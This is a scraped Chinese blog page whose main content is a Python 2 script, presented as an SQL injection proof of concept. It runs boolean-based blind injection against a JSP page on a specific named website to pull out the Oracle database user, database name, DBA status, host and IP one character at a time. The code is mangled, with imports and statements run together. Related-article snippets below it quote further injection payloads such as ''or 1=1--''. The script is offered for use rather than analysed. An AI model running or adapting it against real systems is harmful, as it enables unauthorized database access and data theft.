sql注入pythonpoc_SQL注入POC

最新推荐文章于 2024-05-08 20:29:46 发布
最新推荐文章于 2024-05-08 20:29:46 发布
阅读量254 收藏
点赞数
文章标签: sql注入pythonpoc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39702714/article/details/111451189
版权

#encoding=utf-8

importhttplibimportrequestsimporttimeimportstringimportsys

payloads= list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print '[%s] Start to retrive Oracle info' % time.strftime('%H:%M:%S', time.localtime())

currentuser= ''currentdb= ''isdba1= ''currenthost= ''currentip= ''

for i in range(1,6,1):for payload inpayloads:

response= requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' AND ASCII(SUBSTR(user,{},1))={} AND '1'='1".format(str(i),str(ord(payload))))if len(response.content) > 145000:

currentuser+=payloadprint '[currentuser]',currentuser

time.sleep(0.01)break

for i in range (1,5,1):for payload inpayloads:

response= requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' and ASCII(SUBSTR((SYS_CONTEXT('USERENV','DB_NAME')),{},1))={} and '1'='1".format(str(i),str(ord(payload))))if len(response.content) > 145000:

currentdb+=payloadprint '[currentdb]',currentdb

time.sleep(0.01)break

for i in range (1,6,1):for payload inpayloads:

response= requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' and ASCII(SUBSTR((SYS_CONTEXT('USERENV','ISDBA')),{},1))={} and '1'='1".format(str(i),str(ord(payload))))if len(response.content) > 145000:

isdba1+=payloadprint '[currentisdba1]',isdba1

time.sleep(0.01)break

for i in range (1,9,1):for payload inpayloads:

response= requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' and ASCII(SUBSTR((SYS_CONTEXT('USERENV','HOST')),{},1))={} and '1'='1".format(str(i),str(ord(payload))))if len(response.content) > 145000:

currenthost+=payloadprint '[currenthost]',currenthost

time.sleep(0.01)break

for i in range (1,13,1):for payload inpayloads:

response= requests.get("http://silkroad.testweb.org/testweb/website/201402001/cn/cContent.jsp?id=F0F0D1CCA972D899E040A8C048013331' and ASCII(SUBSTR((SYS_CONTEXT('USERENV','IP_ADDRESS')),{},1))={} and '1'='1".format(str(i),str(ord(payload))))if len(response.content) > 145000:

currentip+=payloadprint '[currentip]',currentip

time.sleep(0.01)break

print '[%s] Stop to retrive Oracle info' % time.strftime('%H:%M:%S', time.localtime())

weixin_39702714
关注
37-4 用Python编写SQL注入的基于错误报告的POC
weixin_43263566的博客
04-22 180
SQL注入是一种常见的应用程序安全漏洞,发生在应用程序与数据库层之间。简而言之,它是通过在输入的字符串中注入SQL指令来实现的,如果程序设计不良未进行充分检查,那么这些注入的指令就可能被数据库服务器误认为是正常的SQL指令而被执行,导致数据泄露或系统被入侵。SQL注入漏洞的原理是在输入的数据中插入SQL代码,以利用应用程序对输入数据的不完善验证。对于分类中的每种类型,都需要针对性地设计相应的防御策略,并在代码编写和测试阶段进行充分的安全审查和测试。
sql注入pythonpoc_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_35517006的博客
02-11 191
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument(‘-u‘,dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_33910434的博客
12-18 302
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequests importargparse parser=argparse.ArgumentParser() parser.add_argument('-u',dest="url") args=parser.parse_args() url=args.ur...
SQL注入POC
weixin_30731305的博客
03-03 494
mysql #encoding=utf-8importhttplibimporttimeimportstringimportsysimportrandomimporturllibheaders={'User-Agent':'Mozilla/5.0(Linux;U;Android2.3.6;en-us;NexusSBuild/GRK39F)Apple...
一个简单sql注入poc
weixin_30279315的博客
12-13 570
最近在提高自己编程能力,拿一些实用的小工具练下。该脚本python语言,主要涉及模块urllib,re。 功能:验证CmsEasy5.5爆账号密码 实验用源码:http://pan.baidu.com/s/1i4lAwBF 搭建环境:phpstudy     试了IIs+php没爆出来最好用phpstudy。 通过浏览器访问确认存在漏洞存在。 用python实现。 i...
sql注入pythonpoc_DVWA SQL-injection 附python脚本
weixin_39896256的博客
12-17 390
SQL-Injectionlow等级首先我们将dvwa等级调到low 如图接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2得到如上回显信息说明存在注入...
04018717_POC_Project_POC_
09-29
标题中的"04018717_POC_Project_POC_"可能是一个项目标识符,表明这是一个关于POC(Proof of Concept)的工程,而"VIVADO"是Xilinx公司开发的一款综合型的硬件描述语言(HDL)设计工具,主要用于FPGA(Field-...
POC.rar_POC_POC in matlab_poC filter_poc匹配_曲线匹配
09-21
标题中的“POC.rar_POC_POC in matlab_poC filter_poc匹配_曲线匹配”揭示了这个压缩包的内容主要涉及POC(Proof of Concept)在MATLAB环境中的应用,特别是关于POC过滤器和POC匹配算法,以及利用这些方法进行ROC...
poc.rar_POC_POC VH_poc控制_poc红绿灯程序_vhdl 实现poc
09-22
标题中的“poc.rar_POC_POC VH_poc控制_poc红绿灯程序_vhdl 实现poc”提到了一个VHDL实现POC(Proof of Concept)项目,它是一个简单的控制程序,可能是针对红绿灯系统的模拟。这个项目主要关注如何用VHDL来构建和...
瑞友天翼2024SQL注入漏洞poc
02-27
标题中的“瑞友天翼2024SQL注入漏洞poc”指的是瑞友天翼2024版本存在SQL注入漏洞,而POC(Proof of Concept)是指概念验证,通常是一个简单的程序或脚本,用于证明某个安全漏洞确实存在。在网络安全领域,POC是黑客...
MS17-010 python poc
03-23
MS17-010 python poc,MS17-010 python pocMS17-010 python pocMS17-010 python poc
sql注入漏洞poc代码fuzz代码
yyyyxzj的博客
08-22 260
"or "a"="aor 1=1--'or 1=1--"or 1=1--'or'a'='a'or''=''or'='or''OR 1=1"or 1=1'xor'or 1=1/*1'or'1'='1or a = a1 or 1=1a'?' or 1=1--------23 OR 1=10 or 1=1or 0=0 --' or 0=0 #or 0=0 #"
sql注入pythonpoco_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_39991531的博客
12-11 142
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument('-u',dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
sql注入
linyuezhouzhou的博客
07-08 479
湖南省网安基地
Python从0到POC编写--SQL注入
最新发布
余十步的博客
05-08 1402
SQL注入POC编写。
sql注入pythonpoc_基于python编写PoC
weixin_39746241的博客
12-17 392
0x02 SQL Injection poc编写已知CmsEasy 5.5 UTF-8程序存在SQL注入,乌云漏洞中的漏洞细节比较详细(由于wooyun已经暂停访问,故不上链接了)。·首先,我们需要下载其相关源码,进行本地搭建。·阅读漏洞细节,我们得知其url与payload如下:URL:http://xxx.xxx/celive/live/header.phpPayload:xajax=Live...
sql注入pythonpoc_python poc是什么
weixin_39627052的博客
12-17 244
如今,PoC 的编写在我们安全研究团队是每个人必备的技能之一。那么,PoC是什么呢?我们应该如何优雅的来进行编写?0x00 我们需要掌握的几个的概念PoC(全称:Proof of Concept)中文意思是“观点证明”。在安全行业中PoC则是一段验证漏洞的程序,使我们能够确认这个漏洞是真实存在的。Python,是一种面向对象、解释型计算机程序设计语言。常见的一些库我们需要了解,比如:urllib,...
37-5 基于时间的盲注 SQL 注入 PoCPython 编写
weixin_43263566的博客
04-24 203
通过这个脚本,我们可以理解到利用Python编写脚本可以自动化执行一些复杂的任务,比如在这个例子中,我们通过自动化的方式来利用时间盲注漏洞获取数据库名称。,通过逐渐增加数据库名称长度的方式,发送带有长度检测payload的HTTP请求,直到找到正确的长度为止。,利用多线程技术,同时测试每个位置上的数据库名称字符,直到获取完整的数据库名称为止。,通过发送包含特殊payload的HTTP请求来检查是否存在SQL注入点。,用于测试给定位置的数据库名称字符是否匹配。下,依次调用上述函数,完成整个过程。
渗透测试之POC基于报错的sql注入
黑面狐
01-03 5445
sql注入一般是主要有三种,基于报错注入,基于布尔的盲注和基于时间的盲注。 原理我不多说了,今天开始写sql注入poc。 首先POC的漏洞存在的证明,而sql注入poc我们只要证明sql语句被执行了即可。 首先看我们的测试环境。 测试环境中我们再注入的参数加个单引号,发现可以有sql报错,从报错额语句中可以看出是基于报错的字符型sql注入 此时用union来确定有多少
SQL注入原理与源码解析:风险防范与避免
本篇教程深入讲解了SQL注入的基础原理以及如何通过实例分析来理解其潜在威胁。SQL注入是一种常见的Web应用程序安全漏洞,它发生在程序员没有正确验证和清理用户输入的情况下,恶意用户可以利用SQL语法结构,插入恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值